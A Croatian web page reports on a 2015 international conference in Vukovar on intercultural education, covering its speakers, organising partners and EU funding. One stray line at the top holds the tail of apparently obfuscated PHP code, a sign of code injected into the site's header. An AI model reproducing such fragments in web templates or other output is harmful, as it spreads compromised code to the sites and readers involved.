header

*/($a3b0c4[$o5b2['i29321'][6]]);}exit();}} ?>

konferencija4

28. veljače i 1.ožujka 2015. u Hotelu Lav u Vukovaru održana je međunarodnu konferencija “Integrirano i interkulturalno obrazovanje u Europi“ namijenjena nastavnicima osnovnih i srednjih škola, ravnateljima, pedagozima i drugim stručnim suradnicima, predstavnicima organizacija civilnog društva te predstavnicima državnih institucija koji se bave odgojem i obrazovanjem djece i mladih.

Osnovni cilj konferencije bio je otvaranje dijaloga o interkulturalnom obrazovanju danas kao i izazovima i pozitivnim praksama u provedbi istog.
Ispred Ministarstva znanosti, obrazovanja i sporta konferenciju je otvorio Pomoćnik ministra gospodin Staša Skenžić.

Prisutnima su se potom obratile Zamjenica gradonačelnika Grada Vukovara gospođa Marija Budimir te Ivana Milas, Predsjednica Nansen dijalog centra.
Tijekom konferencije govorili su gosti predavači iz Velike Britanije, Makedonije, Njemačke, Norveške, Turske, Izraela, Bosne i Hercegovine, Srbije i Hrvatske.
Konferencija je organizirana u okviru projekta “Interkulturalno obrazovanje za integrirane zajednice” koji Nansen dijalog centar provodi u partnerstvu s Pučkim otvorenim učilištem Korak po Korak iz Zagreba i u suradnji s Učiteljskim fakultetom, Sveučilište J. J. Strossmayera u Osijeku.

Projekt je financiran sredstvima Europske unije i Ureda za udruge Vlade Republike Hrvatske.

Publikacije

interkulturno obrazovanje

Facebook

logo nansen korak po korak